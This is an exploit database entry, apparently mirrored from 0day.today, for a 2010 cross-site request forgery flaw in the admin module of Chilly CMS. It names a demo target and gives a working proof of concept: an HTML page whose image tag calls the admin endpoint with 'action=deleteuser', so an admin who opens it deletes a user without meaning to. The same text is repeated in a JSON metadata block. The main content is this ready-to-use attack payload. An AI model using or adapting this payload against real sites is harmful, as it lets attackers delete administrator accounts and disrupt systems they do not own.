Search...

Chilly CMS CSRF Vulnerability

2010-03-16T00:00:00

ID 1337DAY-ID-9671
Type zdt
Reporter Pratul Agrawal
Modified 2010-03-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================
Chilly CMS CSRF Vulnerability
=============================

 # Vulnerability found in- Admin module
   
  # email         [email protected]
   
  # company       aksitservices
   
  # Credit by     Pratul Agrawal
 
  # Software      chilly_CMS

  # Category  	  CMS / Portals
  
  # Site p4ge     http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php
  
  # Plateform     php

  # Greetz to     Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
  
   
   
  #  Proof of concept   #
 
  Targeted URL:  http://www.opensourcecms.com/demo/2/292/chillyCMS
  
 
   Script to Delete the Admin user through Cross Site request forgery
   
             .  ................................................................................................................
   
                        &lt;html&gt;
 
                          &lt;body&gt;
 
                              &lt;img src=http://demo.opensourcecms.com/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID] /&gt;
 
                          &lt;/body&gt;
 
                        &lt;/html&gt;
   
             .  ..................................................................................................................
   
   
   
  After execution refresh the page and u can see that a added content is deleted automatically.




#  0day.today [2018-03-28]  #

JSON Vulners Source

Initial Source

{"published": "2010-03-16T00:00:00", "id": "1337DAY-ID-9671", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-03-28T05:18:01", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-28T05:18:01", "rev": 2}, "vulnersScore": -0.1}, "type": "zdt", "lastseen": "2018-03-28T05:18:01", "edition": 2, "title": "Chilly CMS CSRF Vulnerability", "href": "https://0day.today/exploit/description/9671", "modified": "2010-03-16T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/9671", "references": [], "reporter": "Pratul Agrawal", "sourceData": "=============================\r\nChilly CMS CSRF Vulnerability\r\n=============================\r\n\r\n # Vulnerability found in- Admin module\r\n \r\n # email [email\u00a0protected]\r\n \r\n # company aksitservices\r\n \r\n # Credit by Pratul Agrawal\r\n \r\n # Software chilly_CMS\r\n\r\n # Category \t CMS / Portals\r\n \r\n # Site p4ge http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php\r\n \r\n # Plateform php\r\n\r\n # Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)\r\n \r\n \r\n \r\n # Proof of concept #\r\n \r\n Targeted URL: http://www.opensourcecms.com/demo/2/292/chillyCMS\r\n \r\n \r\n Script to Delete the Admin user through Cross Site request forgery\r\n \r\n . ................................................................................................................\r\n \r\n <html>\r\n \r\n <body>\r\n \r\n <img src=http://demo.opensourcecms.com/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID] />\r\n \r\n </body>\r\n \r\n </html>\r\n \r\n . ..................................................................................................................\r\n \r\n \r\n \r\n After execution refresh the page and u can see that a added content is deleted automatically.\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-28] #"}